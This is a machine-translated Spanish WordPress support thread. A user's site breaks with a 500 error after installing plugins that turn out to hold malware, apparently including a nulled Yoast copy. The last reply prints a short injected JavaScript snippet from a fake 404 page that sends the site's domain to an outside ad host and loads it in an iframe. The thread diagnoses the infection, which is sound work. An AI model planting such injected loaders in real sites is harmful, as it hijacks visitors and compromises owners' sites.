Pregunta sobre Arreglando WordPress de Wordpress:

Eror 500 servidor interno inutilizable

Un usuario preguntó 👇

EDITAR: la primera vez que publico aquí en los foros de soporte, veo que usé el foro equivocado; iré y volveré a publicar en el correcto (no sé cómo mover o eliminar esta publicación)

Mi sitio WP ha estado funcionando durante más de 5 años. La semana pasada, decidí que era hora de tocar un tema nuevo y jugué con algunos temas hasta que me decidí por Fabulous (?). También tengo algunos plugins nuevos instalados, incluidos Classic Editor, Teost y Yeost-No-Adds. Mi sitio se veía hermoso y salí a cenar. Cuando regresé, mientras intentaba editar una de mis páginas, encontré el error 500 Internal Server. Dudo mucho que fuera el nuevo tema, o los Yeost-No-Adds, lo que lo inspiró….

Seguí todos los pasos en estas páginas, de la siguiente manera: 1 – Actualicé mi archivo wpconfig 2 – Actualicé mi archivo htpaccess 3 – Plugins desactivados en mi Administrador de archivos cambiando el nombre del archivo a plugins.hold 4 – plugins deshabilitados en mi base de datos SQL por el cambio creado en el valor de la opción 5 – eliminar el nuevo tema del administrador de archivos 6 – nueva base de datos en mi SQL, donde cargué mi copia de seguridad esta tarde, lo cual hice justo antes de ir a cenar 7 – WordPress reinstalado, incluido el cambio de wpconfig. archivo con el nombre de la nueva base de datos

Ahora estoy al final de mi vida, y no tengo idea de cómo solucionar el problema, ya que aún existe, y necesito actualizar mi página urgentemente (he creado una nueva aplicación, que lanzamos esta semana)

Agradeceríamos cualquier consejo …

Este tema fue modificado hace 1 año, 9 meses por. Razón: foro incorrecto

(@tp)

Hace 1 año, 9 meses

Los errores internos del servidor generalmente se describen con más detalle en el registro de errores del servidor. Si tiene acceso a su registro de errores del servidor, vuelva a crear el error, anote la fecha y la hora, luego verifique inmediatamente el registro de errores del servidor para ver si hubo errores durante ese período de tiempo. Si no tiene acceso al registro de errores de su servidor, pídale a su proveedor de alojamiento que lo busque.

(@watershare)

Hace 1 año, 9 meses

Hola tp

¿Dónde puedo encontrar el registro de errores de mi servidor?

(@tp)

Hace 1 año, 9 meses

Pídale a su proveedor de alojamiento que lo busque.

(@binarywc)

Hace 1 año, 9 meses

@watershare

Vio su publicación al dorso en el hilo duplicado diciendo que ahora recibe un error 404. ¿Puede ir a wp-admin? Si es así, intente restablecer la configuración de su enlace permanente para ver si eso soluciona el problema.

Puede acceder a estas configuraciones una vez que haya iniciado sesión en wp-admin yendo a Configuración → Enlaces permanentes.

(@watershare)

Hace 1 año, 9 meses

Hola binario

No puedo encontrar wp-admin – Me fui y cambié mi configuración de inicio de sesión en mi servidor mySQL, porque pensé que eso pudo haber causado el problema, pero aún no puedo encontrar la página de inicio de sesión amigable ponte tan hermosa …

(@watershare)

Hace 1 año, 9 meses

Puede resultar útil eliminar el ID de usuario anterior | desde mi SQL, y simplemente agregarme como un usuario administrador completamente nuevo?

(@binarywc)

Hace 1 año, 9 meses

En este punto, una recomendación de TP sería su mejor opción. Trabaje con su proveedor para obtener y obtener los registros de su servidor.

(@watershare)

Hace 1 año, 9 meses

¡Ay!

Gracias chicos, muchas gracias por intentar ayudar

(@jnashhawkins)

Hace 1 año, 9 meses

Mis alertas se activaron en mi navegador Chrome cuando fui a la página de servicios.

OMS http://iyfipun.com/? Hay una referencia a ese sitio en su https://www.cbosss.com/404testpage4525d2fdc probablemente un archivo que ha sido pirateado, dañado o algo así.

No puedo entender su sitio, pero el tema en el lado de ‘entrenamiento’ es Agama o algo así … Dijiste que estabas ejecutando el tema Fabulous, lo que me hace pensar que hay varias o dos instalaciones discretas de Ágata de WordPress.

¿Es eso cierto?

Hice un escaneo en el sitio y en el lado de entrenamiento y solo encontré dos plugins, pero mencionaste algunos que se veían extraños pero que podrían afectar a Yoast … Recomendaría eliminarlos.

En el lado del ‘servicio’, quiero eliminar todo el directorio de plugins. Simplemente cámbiele el nombre ahora.

Algo en el lado del ‘servicio’ parece estar filtrando los datos seriales de su base de datos y pensé que vi ‘admin’ allí antes de que se fueran.

Si puede ejecutar el lado del ‘servicio’ nuevamente, es posible que desee intentar instalar los plugins de WordFence e iThemesSecurity juntos y realizar un escaneo de malware desde WordFence.

También me gustaría instalar el plugin del escáner Sucuri y ejecutarlo.

Nunca puedo recomendar manipular los datos sin procesar de la base de datos a menos que tenga una razón específica para hacerlo. Un problema simple podría verse agravado por su prisa por sumergirse, lo que podría explicar la fuga de datos que vi.

Si encuentra que las cosas están funcionando nuevamente, recomendaría este artículo. Una vez que haya terminado, es posible que desee implementar algunas (si no todas) de las medidas de seguridad recomendadas.

Si fuera yo, seguiría ejecutando los dos primeros plugins de seguridad que sugerí anteriormente y tendría el Escáner Sucuri a mano. Me gustaría repensar el diseño de mi sitio para mejorar un poco mi sitio usando los plugins de WordPress. Ahora tiene una página HTML separada que está fuera del propio WordPress para enviar a sus visitantes a ambos lados.

Otra posible sugerencia es poner su sitio en CloudFlare después de haber resuelto las cosas que ocultarán el servidor web Apache de los ojos ocupados.

Esta respuesta fue modificada hace 1 año, 9 meses por.

(@watershare)

Hace 1 año, 9 meses

@jnashhawkins, muchas gracias por su respuesta

Seguí las recomendaciones de @binarywc y @tp, y me comuniqué con mi proveedor. Resulta que había malware oculto en DOS de los plugins que había instalado, a saber, Yoast_No_Adds y Spider Page Spider. Spider Page Admin eliminó mis privilegios de administrador, y aunque deshabilité los plugins, uno de esos dos plugins me mantuvo pateando …

Sí, tengo dos instalaciones de WordPress separadas, afortunadamente, ya que ahora estoy comercializando un curso de capacitación en mi sitio de RTraining (que ejecuta Agama), y saltaría de un puente si el sitio de capacitación también estuviera comprometido. Maté esos dos plugins inmediatamente en mi sitio de entrenamiento.

PUEDO ejecutar Wordfence en mis dos sitios: un hermoso plugin, pero no detectaron las inyecciones de malware. Aunque NO TENGO IDEA http://iyfipun.com/ ¿Sospecho que son los piratas informáticos los que están detrás de esto? Incluso recibí un correo electrónico de «ionsa.net» advirtiéndome que mi sitio está infectado en este momento, y «ofreciéndome» para «arreglarlo» por mí, por un precio, por supuesto … Definitivamente seguiré tus sugerencias, y También instalé iThemesSecurity y Sucuri Scanner.

El problema con mi sitio de Servicios es que tenemos que crear una base de datos completamente nueva y crear un nuevo sitio web, y estoy a punto de empezar de cero.

No tengo idea de cómo puedo configurar mi sitio de manera diferente a la forma en que estaba configurado actualmente, con la página separada html discreta fuera de WordPress, o cómo configurar mi sitio en Cloudfare – ¿ cualquier sugerencia o recurso al respecto agradecería 🙂

Y gracias de nuevo, aprendí la lección de la manera difícil, fue mi error estar demasiado ansioso por actualizar mi sitio, y agregué plugins que no debería haber instalado 🙁

(@watershare)

Hace 1 año, 9 meses

Ah, ¿y qué hago para eliminar esa basura de «impunificar» de mi página de destino?

(@jnashhawkins)

Hace 1 año, 9 meses

Me alegro de que lo hayas manejado.

Pondría mi energía en arreglar lo que tengo y dejar las cosas solo para decorar la seguridad.

Una vez que el polvo se haya asentado y tenga todo funcionando, es posible que desee echar un vistazo a CloudFlare. Es realmente bastante fácil, pero tómate un respiro del resto de este lío antes de mirarlo.

Cualquier advertencia sobre CloudFlare … el lado libre de CloudFlare es un poco estricto en la respuesta del servidor, por lo que si no tiene el host actual para la tarea, obtendrá errores de tipo ‘500’. El servicio DNS por sí solo todavía merece ese esfuerzo. Puede desactivar el lado Proxy si lo necesita.

Esa primera página estará bien entonces y hará que todo el sitio se vea perfecto desde el exterior. El alojamiento de IPage (si recuerdo correctamente que estás en IPage) debería poder responder rápidamente a eso.

Si necesita algo más, pregunte.

Esta respuesta fue modificada hace 1 año, 9 meses por.

(@watershare)

Hace 1 año, 9 meses

Gracias @jnashhawkins de nuevo, fuiste muy útil (aunque la última parte sobre el uso de la nube me pasó por alto, jajaja)

Pero seguiré tu sugerencia y tomaré un inhalador después de que todo esto esté arreglado primero, y luego investigaré Cloudfare, tal vez durante las vacaciones.

Tengo cuatro preguntas más – jajaja – va aquí: (1) ¿cómo elimino esa basura «impunificante» de mi página de destino? (2) ¿cómo puedo proteger o cambiar la ubicación o el diseño o la configuración de mis páginas de destino mientras tanto hasta que vaya a Cloudfare? (3) ¿Mi sitio de entrenamiento es seguro o los piratas informáticos podrían entrar y romperlo también? (4) ¿Debo informar los problemas de seguridad con estos plugins en algún lugar, de modo que se pueda evitar que mi mala experiencia le suceda a otra persona?

Está bien si no puedes responder a todas, jajaja, solo quiero evitar tener ataques de pánico por todo esto 🙂

Esta respuesta fue modificada hace 1 año, 9 meses por.

(@tp)

Hace 1 año, 9 meses

Siga esta guía con atención.

Una vez que haya terminado, es posible que desee implementar algunas (si no todas) de las medidas de seguridad recomendadas y comenzar a realizar una copia de seguridad de su sitio.

(@ g0tr00t)

Hace 1 año, 9 meses

@watershare

1) Ahora no veo ningún texto «impunificar» en la página de destino

2) El servicio gratuito de Cloudflare no ayudará mucho en este caso. Su servicio gratuito es excelente para bloquear ataques de red como DoS / DDoS, pero lo ideal es que necesite un firewall más fuerte y no solo una CDN para una mejor seguridad.

3) iPage parece estar en el mismo plan de alojamiento compartido, por lo que debe asumir que ambos ya están comprometidos.

4) No recomendaría hacerlo hasta que tenga una prueba definitiva. Es extremadamente común que los piratas informáticos inyecten plugins y archivos de temas con malware, pero eso no significa de ninguna manera que los creadores de ese plugin o tema estuvieran involucrados en dicha actividad.

Una cosa que noté fue que mencionaste instalar el plugin “Yoast_No_Adds”. No puedo encontrar ninguna información de repositorio oficial en un plugin que tenga ese nombre de directorio y el nombre en sí está en duda. Parece ser una versión pirateada / anulada de Yoast premium. Si ese es el caso, entonces ese es tu problema.

Editar:

Ah, y por cierto, iyfipgun.com solo se carga cuando se envía una solicitud 404 al sitio web. parece que algo, probablemente un archivo de tema o un archivo de plugin, está generando una página 404 falsa que carga anuncios de iyfipgun.com:


var url = 'http://www.iyfipgun.com/?dn='
                + document.domain + '&pid=9POL6F2H4';

            $(document).ready(function() {
                $('#ad_frame').attr('src', url);

Esta respuesta fue modificada hace 1 año, 9 meses por.

¿Solucionó tu problema??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *